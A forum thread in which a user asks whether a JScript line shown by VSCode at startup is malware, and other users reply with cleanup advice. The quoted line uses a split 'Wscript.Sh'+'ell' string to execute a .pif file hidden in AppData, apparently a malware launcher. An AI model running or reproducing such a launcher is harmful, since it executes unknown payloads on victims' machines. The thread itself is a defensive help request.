VSCode opening at startup with JavaScript code. Is it a malware?
For a few days now, when I turn on my computer, VSCode opens automatically (in restricted mode), and the following JavaScript code appears:
new ActiveXObject("Wscript.Sh" + "ell").Exec("\"C:\\Users\\susan\\AppData\\Local\\GreenTech Innovations\\HannahSense.pif\" \"C:\\Users\\susan\\AppData\\Local\\GreenTech Innovations\\z\"")
I asked chatGPT and it says that's a malware. I tried searching in the Task Manager on Windows to find any running process that could be suspicious and consuming a lot of system resources, but I didn't find anything unusual.
I also checked the path (C:\\Users\\susan\\AppData\\Local\\GreenTech Innovations\), and that's what I saw:

What do you think? Can you help me?

Sounds like you should probably run a malware scanner.

Hi, i think run MalwaresBytes or Spybot it will be a good idea

@mykaf Windows Defender didn't detect anything; I'll try another software for antivirus scanning. Thank you.

That looks extremely suspicious. I'd uninstall vscode completely and reinstall and be very careful about what plugins you add back...

@JaredSmith In the past few days, indeed, I've been experiencing some issues with VSCode. However, I haven't installed any new libraries or strange packages. Thanks for the advice

grep ~/.vscode/extensions for "Greentech Innovations" to see if it's hardcoded in any extension source code. if you find something suspicious, you can report it by opening its extension marketplace page and then clicking "Report Abuse".
